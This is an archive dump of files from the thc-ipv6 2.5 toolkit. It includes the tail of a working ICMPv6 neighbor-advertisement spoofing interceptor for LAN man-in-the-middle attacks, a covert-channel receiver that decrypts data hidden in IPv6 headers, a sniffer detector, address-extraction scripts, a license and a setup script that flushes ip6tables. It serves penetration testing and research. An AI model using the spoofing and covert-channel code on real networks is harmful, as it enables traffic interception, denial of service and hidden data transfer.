ipv6->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum / 256; ipv6->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum % 256; if (do_dst) thc_send_as_fragment6(interface, ipv6->pkt + 22, ipv6->pkt + 38, ptype, ipv6->pkt + 40 + 14, ipv6->pkt_len - 40 - 14, 1240); else thc_send_pkt(interface, pkt, &pkt_len); if (do_reverse) { memcpy(ipv62->pkt, data + 74, 4); // create the multicast mac for the dst so we dont need to do a NS :-) memcpy(ipv62->pkt + 38, data + 62, 16); // copy target do dst6 memcpy(ipv62->pkt + 22, data + 22, 16); // copy source to source memcpy(ipv62->pkt + 62 + (do_dst * 1400) + (do_hop + do_frag) * 8, data + 22, 16); // copy source to target ipv62->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; ipv62->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = 0; mychecksum = checksum_pseudo_header(ipv62->pkt + 22, ipv62->pkt + 38, NXT_ICMP6, ipv62->pkt + 54 + (do_dst * 1400) + (do_hop + do_frag) * 8, 32); ipv62->pkt[56 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum / 256; ipv62->pkt[57 + (do_dst * 1400) + (do_hop + do_frag) * 8] = mychecksum % 256; if (do_dst) thc_send_as_fragment6(interface, ipv62->pkt + 22, ipv62->pkt + 38, ptype, ipv62->pkt + 40 + 14, ipv62->pkt_len - 40 - 14, 1240); else thc_send_pkt(interface, pkt2, &pkt2_len); ptr2 = thc_ipv62notation(ipv62->pkt + 38); ptr4 = thc_ipv62notation(ipv62->pkt + 22); printf("Spoofed packet to %s as %s\n", ptr2, ptr4); free(ptr2); free(ptr4); } if ((pp[pp_cnt] = fork()) == 0) { usleep(200); debug = 0; if (do_dst) { thc_send_as_fragment6(interface, ipv6->pkt + 22, ipv6->pkt + 38, ptype, ipv6->pkt + 40 + 14, ipv6->pkt_len - 40 - 14, 1240); thc_send_as_fragment6(interface, ipv62->pkt + 22, ipv62->pkt + 38, ptype, ipv62->pkt + 40 + 14, ipv62->pkt_len - 40 - 14, 1240); } else { thc_send_pkt(interface, pkt, &pkt_len); if (do_reverse) thc_send_pkt(interface, pkt2, &pkt2_len); } sleep(1); if (do_loop == 1) { signal(SIGTERM, exit); signal(SIGSEGV, exit); signal(SIGHUP, exit); signal(SIGINT, exit); while (1) { sleep(5); if (do_dst) { thc_send_as_fragment6(interface, ipv6->pkt + 22, ipv6->pkt + 38, ptype, ipv6->pkt + 40 + 14, ipv6->pkt_len - 40 - 14, 1240); thc_send_as_fragment6(interface, ipv62->pkt + 22, ipv62->pkt + 38, ptype, ipv62->pkt + 40 + 14, ipv62->pkt_len - 40 - 14, 1240); } else { thc_send_pkt(interface, pkt, &pkt_len); if (do_reverse) thc_send_pkt(interface, pkt2, &pkt2_len); } } } exit(0); } else if (do_loop == 1 && pp[pp_cnt] != -1) { if (pp_cnt < 65534) pp_cnt++; else do_loop = 2; } ipv6->pkt[56] = 0; ipv6->pkt[57] = 0; ipv6->pkt[pkt_len - 28] = 0x60; // set SOL flag again (void) wait3(NULL, WNOHANG, NULL); return; } int main(int argc, char *argv[]) { char dummy[24], mac[16] = "", buf2[6], buf3[1398]; unsigned char *ownmac = mac; int i, j; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); if (debug) printf("Preparing spoofed packet for speed-up\n"); while ((i = getopt(argc, argv, "FHDRl")) >= 0) { switch (i) { case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; case 'R': do_reverse = 1; break; case 'l': do_loop = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); interface = argv[optind]; if (argc - optind == 2 && argv[optind + 1] != NULL) sscanf(argv[optind + 1], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else ownmac = thc_get_own_mac(interface); if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } memset(dummy, 'X', sizeof(dummy)); dummy[16] = 2; dummy[17] = 1; memcpy(&dummy[18], ownmac, 6); memset(buf2, 0, sizeof(buf2)); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); for (i = 0; i <= 0 + do_reverse; i++) { // printf("i: %d\n", i); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, dummy, dummy, 255, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { ptype = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (ptype == NXT_ICMP6) ptype = NXT_FRAG; for (j = 0; j < do_frag; j++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (ptype == NXT_ICMP6) ptype = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, ICMP6_NEIGHBORADV_SOLICIT | ICMP6_NEIGHBORADV_OVERRIDE | ICMP6_NEIGHBORADV_ROUTER, dummy, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, ownmac, dummy, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; memset(ipv6->pkt + 56 + (do_dst * 1400) + (do_hop + do_frag) * 8, 0, 2); // reset checksum to zero if (debug) { thc_dump_data(ipv6->pkt, ipv6->pkt_len, "Prepared spoofing packet"); printf("\n"); } // printf("i: %d, do_reverse: %d\n", i, do_reverse); if (i == 0 && do_reverse) { // printf("ipv62->ipv6 %p\n", ipv6); ipv62 = ipv6; ipv62->pkt[0] = 0x33; // multicast mac hack for destination ipv62->pkt[1] = 0x33; // multicast mac hack for destination ipv6 = NULL; pkt2 = pkt; pkt = NULL; pkt2_len = pkt_len; pkt_len = 0; ipv62->pkt[pkt2_len - 28] = 0xa0; // reset SOL flag, ROUTER+OVERRIDE only } } signal(SIGTERM, kill_children); signal(SIGSEGV, kill_children); signal(SIGHUP, kill_children); signal(SIGINT, kill_children); memset((char*)pp, 0, sizeof(pp)); printf("Remember to enable routing (ip_forwarding), you will denial service otherwise!\n"); printf(" => echo 1 > /proc/sys/net/ipv6/conf/all/forwarding\n"); printf("Started ICMP6 Neighbor Solitication Interceptor (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL); } thc-ipv6-2.5/extract_networks6.sh0000755000000000000000000000151012234222354015545 0ustar rootroot#!/bin/bash test -z "$1" -o "$1" = "-h" && { echo $0 FILE echo prints the networks found in FILE #, specify - for stdin exit 1 } test -e "$1" -o "$1" = "-" || { echo Error: File $1 not found exit 1 } { test "$1" = "-" && { echo no } || { cat $1 | egrep :: | egrep -v '^[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}|[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}$' | sed 's/::.*/::/' cat $1 | egrep -v :: | awk -F: '{print $1":"$2":"$3":"$4"::"}' cat $1 | egrep :: | egrep '^[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}|[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}$' | sed 's/::/:0:0:/' | awk -F: '{print $1":"$2":"$3":"$4"::"}' } } | sort -n exit 0 thc-ipv6-2.5/detect_sniffer6.c0000644000000000000000000001105312251022434014727 0ustar rootroot #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" struct timespec ts, ts2; int found = 0, oneonly = 0; char doubles[256][16]; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target6]\n\n", prg); printf("Tests if systems on the local LAN are sniffing.\n"); printf("Works against Windows, Linux, OS/X and *BSD\n"); printf("If no target is given, the link-local-all-nodes address is used, which\nhowever not always works.\n"); exit(-1); } void alarming() { if (found == 0) printf("No packets received, no vulnerable system seems to be sniffing.\n"); else printf("%d sniffing host%s detected.\n", found, found == 1 ? "" : "s"); exit(0); } void check_packets(u_char *pingdata, const struct pcap_pkthdr *header, const unsigned char *data) { int len = header->caplen, ok = 0, i; unsigned char *ptr = (unsigned char *) data; if (do_hdr_size) { len -= do_hdr_size; ptr += do_hdr_size; if ((ptr[0] & 240) != 0x60) return; } else { len -= 14; ptr += 14; } if (len < 136) // ignoring too short packet return; for (i = 0; i < 8 && ok == 0; i++) if (memcmp(pingdata, data + 106 + i, 8) == 0) ok = 1; if (ok) { if (found) { for (i = 0; i < found && ok == 1; i++) if (memcmp(doubles[i], thc_ipv62notation(ptr + 8), 16) == 0) ok = 0; } if (ok) { printf(" Sniffing host detected: %s\n", thc_ipv62notation(ptr + 8)); memcpy(doubles[found], thc_ipv62notation(ptr + 8), 16); found++; if (oneonly) alarming(); } } } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, *pkt2 = NULL, buf[2096] = "thcping6", buf2[6]; unsigned char *src6 = NULL, *dst6 = NULL; unsigned char dmac[7] = { 0x33, 0x33, 0xff, 0x01, 0x00, 0xfe, 0x00 }; char string[255] = "icmp6 and dst ", *interface; int pkt1_len = 0, pkt2_len = 0, flags = 0, j; pcap_t *p; if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); memset(buf, 0, sizeof(buf)); for (j = 0; j < (128 / 8); j++) memcpy(buf + j * 8, "thcsniff", 8); memset(buf2 + 2, 0, 4); buf2[0] = NXT_INVALID; buf2[1] = 1; interface = argv[1]; if (argc == 3) { if ((dst6 = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: not a valid target: %s\n", argv[2]); exit(-1); } if (dst6[0] != 0xff) oneonly = 1; } else dst6 = thc_resolve6("ff02::1"); if ((src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: no IPv6 address found for interface %s!\n", interface); exit(-1); } if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_ECHOREQUEST, 0, flags, (unsigned char *) &buf, 128, 0) < 0) return -1; if (thc_generate_pkt(interface, NULL, dmac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt2, &pkt2_len, (unsigned char *) &buf2, sizeof(buf2)) < 0) return -1; if (thc_add_icmp6(pkt2, &pkt2_len, ICMP6_ECHOREQUEST, 0, flags, (unsigned char *) &buf, 128, 0) < 0) return -1; if (thc_generate_pkt(interface, NULL, dmac, pkt2, &pkt2_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } strcat(string, thc_ipv62notation(src6)); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } signal(SIGALRM, alarming); alarm(3); printf("Sending sniffer detection packets to %s\n", thc_ipv62notation(dst6)); thc_send_pkt(interface, pkt1, &pkt1_len); thc_send_pkt(interface, pkt2, &pkt2_len); thc_send_pkt(interface, pkt1, &pkt1_len); thc_send_pkt(interface, pkt2, &pkt2_len); while (1) { thc_pcap_check(p, (char *) check_packets, buf); } return 0; // not reached } thc-ipv6-2.5/LICENSE.OPENSSL0000644000000000000000000002053412234222353013647 0ustar rootroot/* * (c) 2002, 2003, 2004 by Jason McLaughlin and Riadh Elloumi * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License as * published by the Free Software Foundation; either version 2 of the * License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, but * is provided AS IS, WITHOUT ANY WARRANTY; without even the implied * warranty of MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, and * NON-INFRINGEMENT. See the GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, * MA 02111-1307, USA. * * In addition, as a special exception, the copyright holders give * permission to link the code of portions of this program with the * OpenSSL library under certain conditions as described in each * individual source file, and distribute linked combinations * including the two. * You must obey the GNU General Public License in all respects * for all of the code used other than OpenSSL. If you modify * file(s) with this exception, you may extend this exception to your * version of the file(s), but you are not obligated to do so. If you * do not wish to do so, delete this exception statement from your * version. If you delete this exception statement from all source * files in the program, then also delete it here. */ Certain source files in this program permit linking with the OpenSSL library (http://www.openssl.org), which otherwise wouldn't be allowed under the GPL. For purposes of identifying OpenSSL, most source files giving this permission limit it to versions of OpenSSL having a license identical to that listed in this file (LICENSE.OpenSSL). It is not necessary for the copyright years to match between this file and the OpenSSL version in question. However, note that because this file is an extension of the license statements of these source files, this file may not be changed except with permission from all copyright holders of source files in this program which reference this file. LICENSE ISSUES ============== The OpenSSL toolkit stays under a dual license, i.e. both the conditions of the OpenSSL License and the original SSLeay license apply to the toolkit. See below for the actual license texts. Actually both licenses are BSD-style Open Source licenses. In case of any license issues related to OpenSSL please contact openssl-core@openssl.org. OpenSSL License --------------- /* ==================================================================== * Copyright (c) 1998-2001 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.openssl.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * openssl-core@openssl.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.openssl.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ Original SSLeay License ----------------------- /* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com) * All rights reserved. * * This package is an SSL implementation written * by Eric Young (eay@cryptsoft.com). * The implementation was written so as to conform with Netscapes SSL. * * This library is free for commercial and non-commercial use as long as * the following conditions are aheared to. The following conditions * apply to all code found in this distribution, be it the RC4, RSA, * lhash, DES, etc., code; not just the SSL code. The SSL documentation * included with this distribution is covered by the same copyright terms * except that the holder is Tim Hudson (tjh@cryptsoft.com). * * Copyright remains Eric Young's, and as such any Copyright notices in * the code are not to be removed. * If this package is used in a product, Eric Young should be given attribution * as the author of the parts of the library used. * This can be in the form of a textual message at program startup or * in documentation (online or textual) provided with the package. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * "This product includes cryptographic software written by * Eric Young (eay@cryptsoft.com)" * The word 'cryptographic' can be left out if the rouines from the library * being used are not cryptographic related :-). * 4. If you include any Windows specific code (or a derivative thereof) from * the apps directory (application code) you must include an acknowledgement: * "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" * * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * The licence and distribution terms for any publically available version or * derivative of this code cannot be changed. i.e. this code cannot simply be * copied and put under another distribution licence * [including the GNU Public Licence.] */ thc-ipv6-2.5/covert_send6d.c0000644000000000000000000000747712251022434014441 0ustar rootroot#include #include #include #include #ifndef _HAVE_SSL int main() { fprintf(stderr, "Error: thc-ipv6 was compiled without openssl support, covert_send6d disabled.\n"); return -1; } #else #if (_TAKE2 > 0) int main() { fprintf(stderr, "Error: tool does not work on big endian\n"); return -1; } #endif #include #include #include #include #include #include #include #include #include "thc-ipv6.h" FILE *f; BF_KEY bfkey; int rawmode = 0, seq = 1, id = 0, num = 0; char hash[20] = "", *key = NULL, vec[8] = { 0, 0, 0, 0, 0, 0, 0, 0 }; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-k key] interface file\n\n", prg); printf("Options:\n"); printf(" -k key decrypt the content with Blowfish-160\n"); printf("\n"); printf("Writes covertly received content to FILE.\n"); exit(-1); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { int len = header->caplen, rlen, bytes = 0, hlen, end = 0, pos, dlen = 0, done = 0; unsigned char *ptr = (unsigned char *) data, rbuf[6000], wbuf[6000]; if (!rawmode) { if (do_hdr_size) { ptr += do_hdr_size; len -= do_hdr_size; if ((ptr[0] & 240) != 0x60) return; } else { ptr += 14; len -= 14; } } if (len < 58) // too short return; if (ptr[6] != NXT_DST) return; if (ptr[42] != 0x10 || ptr[43] != 4 || ptr[48] != 0x11 || ptr[49] != 4 || ptr[54] != 0x12) return; if (memcmp(ptr + 50, (char *) &seq, 4) != 0) return; if (seq == 1) memcpy((char *) &id, ptr + 44, 4); else if (memcmp(ptr + 44, (char *) &id, 4) != 0) return; dlen = 40 + (ptr[41] + 1) * 8; rlen = len - 54; pos = 54; while (rlen > 0 && end == 0 && dlen >= pos && done == 0) { if (ptr[pos] == 0) done = 1; else if (ptr[pos] < 0x12) return; else if (ptr[pos] > 0x1f) return; else if (ptr[pos] == 0x1f) end = 1; else { if ((hlen = ptr[pos + 1]) >= rlen) return; if (bytes + hlen >= sizeof(rbuf)) return; memcpy(rbuf + bytes, ptr + pos + 2, hlen); rlen = rlen - (hlen + 2); pos = pos + hlen + 2; bytes = bytes + hlen; } } if (bytes > 0) { if (key != NULL) { BF_cfb64_encrypt((unsigned char *) rbuf, (unsigned char *) wbuf, bytes, &bfkey, (unsigned char *) vec, &num, BF_DECRYPT); memcpy(rbuf, wbuf, bytes); } fwrite(rbuf, 1, bytes, f); } printf("Received packet seq# %d\n", seq); seq++; if (end) { printf("All received.\n"); fclose(f); exit(0); } } int main(int argc, char *argv[]) { char *interface; pcap_t *p; int i; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "rk:")) >= 0) { switch (i) { case 'r': rawmode = 1; thc_ipv6_rawmode(1); break; case 'k': key = optarg; break; default: fprintf(stderr, "Unknown option\n"); exit(-1); } } interface = argv[optind]; if ((f = fopen(argv[optind + 1], "w")) == NULL) { fprintf(stderr, "Error: file %s cout not be created\n", argv[optind + 1]); exit(-1); } if (key != NULL) { memset(&bfkey, 0, sizeof(bfkey)); SHA1((unsigned char *) key, strlen(key), (unsigned char *) hash); BF_set_key(&bfkey, sizeof(hash), (unsigned char *) hash); memset(vec, 0, sizeof(vec)); num = 0; } if ((p = thc_pcap_init(interface, "ip6")) == NULL) { fprintf(stderr, "Error: could not capture on interface %s\n", interface); exit(-1); } while (1) { thc_pcap_check(p, (char *) check_packets, NULL); usleep(50); } return 0; } #endif thc-ipv6-2.5/extract_hosts6.sh0000755000000000000000000000152612234222354015040 0ustar rootroot#!/bin/bash test -z "$1" -o "$1" = "-h" && { echo $0 FILE echo prints the host parts of IPv6 addresses in FILE #, specify - for stdin exit 1 } test -e "$1" -o "$1" = "-" || { echo Error: File $1 not found exit 1 } { test "$1" = "-" && { echo no } || { cat $1 | egrep :: | egrep -v '^[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}|[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}$' | sed 's/.*::/::/' cat $1 | egrep -v :: | awk -F: '{print "::"$5":"$6":"$7":"$8}' cat $1 | egrep :: | egrep '^[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}|[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}$' | sed 's/::/:0:0:/' | awk -F: '{print "::"$5":"$6":"$7":"$8}' } } | sort -n exit 0 thc-ipv6-2.5/detect-new-ip6.c0000644000000000000000000000452212251022434014413 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" unsigned char *pkt = NULL, *dstmac, *dst; int pkt_len = 0; int mychecksum; char *interface, *script = NULL, es[300]; char *ptr3, *ptr4; int i; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [script]\n\n", prg); printf("This tools detects new IPv6 addresses joining the local network.\n"); printf("If script is supplied, it is executed with the detected IPv6 address as first\nand the interface as second command line option.\n\n"); exit(-1); } void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14); int len = header->caplen - 14; if (do_hdr_size) { ipv6hdr = (unsigned char *) (data + do_hdr_size); len = header->caplen - do_hdr_size; if ((ipv6hdr[0] & 240) != 0x60) return; } if (debug) { printf("DEBUG: packet received\n"); thc_dump_data((unsigned char *) data, header->caplen, "Received Packet"); } if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_NEIGHBORSOL || len < 64) return; if (*(ipv6hdr + 8) + *(ipv6hdr + 9) + *(ipv6hdr + 10) + *(ipv6hdr + 11) + *(ipv6hdr + 12) + *(ipv6hdr + 13) + *(ipv6hdr + 14) + *(ipv6hdr + 15) != 0) return; if (debug) printf("DEBUG: packet is a valid duplicate ip6 check via icmp6 neighbor solitication\n"); (void) wait3(NULL, WNOHANG, NULL); ptr4 = thc_ipv62notation((char *) (ipv6hdr + 48)); printf("Detected new ip6 address: %s\n", ptr4); if (script != NULL && fork() == 0) { snprintf(es, sizeof(es), "%s %s %s", script, ptr4, interface); if (system(es) < 0) fprintf(stderr, "Error: Executing failed - %s\n", es); exit(0); } free(ptr4); return; } int main(int argc, char *argv[]) { if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); interface = argv[1]; if (argc > 2) script = argv[2]; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); printf("Started ICMP6 DAD detection (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL); } thc-ipv6-2.5/thc-ipv6-setup.sh0000755000000000000000000000675712234222355014672 0ustar rootroot#!/bin/bash ON=1 OK="" test "$1" = "on" && { shift ; } test "$1" = "enable" && { shift ; } test "$1" = "en" && { shift ; } test "$1" = "ea" && { shift ; } test "$1" = "off" && { ON=0 ; shift ; } test "$1" = "no" && { ON=0 ; shift ; } test "$1" = "non" && { ON=0 ; shift ; } test "$1" = "disable" && { ON=0 ; shift ; } test "$1" = "dis" && { ON=0 ; shift ; } test "$2" = "off" && { ON=0 ; shift ; } test "$2" = "no" && { ON=0 ; shift ; } test "$2" = "non" && { ON=0 ; shift ; } test "$2" = "disable" && { ON=0 ; shift ; } test "$2" = "dis" && { ON=0 ; shift ; } test "$1" = "-h" -o "$1" = "help" -o "$1" = "--help" -o -z "$1" && { echo "Syntax: $0 [no] command [options]" echo echo Available commands: echo "" ipv6 - enable ipv6 "(option: interface)" echo "" ra - "enables everything router advertisement (RA) (option: interface)" echo "" autoconf - perform autoconfiguration "(option: interface)" echo "" route - enables default route on RA "(option: interface)" echo "" dad - enable duplicate address detection "(option: interface)" echo "" privacy - enable the temporary address privacy extension "(option: interface)" echo "" forward - enables or disables forwarding echo "" redirfilter - sets ip6table to prevent sedning redirects "(option: interface)" echo "" src - enables or disables source routing and routing echo "" fwreset - reset the ipv6 firewalls echo prepend the keyword \"no\" to use reverse the function of the command OK=1 } test "$1" = "srcroute" -o "$1" = "sourceroute" -o "$1" = "src" && { for i in /proc/sys/net/ipv6/conf/*; do echo $ON > $i/accept_source_route echo $ON > $i/forwarding done OK=1 } test "$1" = "route" -o "$1" = "routing" -o "$1" = "forward" -o "$1" = "forwarding" && { for i in /proc/sys/net/ipv6/conf/*; do echo $ON > $i/forwarding done OK=1 } test "$1" = "dad" && { INT=$2 test -z "$2" && INT=all echo $ON > /proc/sys/net/ipv6/conf/$INT/accept_dad echo $ON > /proc/sys/net/ipv6/conf/$INT/dad_transmits OK=1 } test "$1" = "redirfilter" -o "$1" = "redir" && { INT="" test -n "$2" && INT="-o $2" ip6tables -I OUTPUT $INT -p icmpv6 --icmpv6-type redirect -j DROP OK=1 } test "$1" = "autoconf" -o "$1" = "autoconfig" -o "$1" = "autoconfiguration" -o "$1" = "slaac" && { INT=$2 test -z "$2" && INT=all echo $ON > /proc/sys/net/ipv6/conf/$INT/autoconf OK=1 } test "$1" = "privacy" -o "$1" = "priv" -o "$1" = "tempaddr" -o "$1" = "tempaddress" && { INT=$2 test -z "$2" && INT=all echo $ON > /proc/sys/net/ipv6/conf/$INT/use_tempaddr OK=1 } test "$1" = "firewall" -o "$1" = "fwreset" -o "$1" = "resetfw" && { ip6tables -F ip6tables -X ip6tables -Z ip6tables -P INPUT ACCEPT ip6tables -P FORWARD ACCEPT ip6tables -P OUTPUT ACCEPT OK=1 } test "$1" = "route" -o "$1" = "routes" && { INT=$2 test -z "$2" && INT=all echo $ON > /proc/sys/net/ipv6/conf/$INT/accept_ra_defrtr OK=1 } test "$1" = "ra" && { INT=$2 test -z "$2" && INT=all echo $ON > /proc/sys/net/ipv6/conf/$INT/accept_ra echo $ON > /proc/sys/net/ipv6/conf/$INT/accept_ra_defrtr echo $ON > /proc/sys/net/ipv6/conf/$INT/accept_ra_pinfo echo $ON > /proc/sys/net/ipv6/conf/$INT/autoconf OK=1 } test "$1" = "ipv6" -o "$1" = "ip6" && { INT="$2" test -z "$2" && { INT=all test "$ON" = 0 && modprobe -v ipv6 test "$ON" = 1 && rmmod ipv6 } test "$ON" = 0 && RON=1 test "$ON" = 1 && RON=0 echo $RON > /proc/sys/net/ipv6/conf/$INT/disable_ipv6 OK=1 } test -z "$OK" && { echo Error: unknown command: $1 ; exit 1 ; } 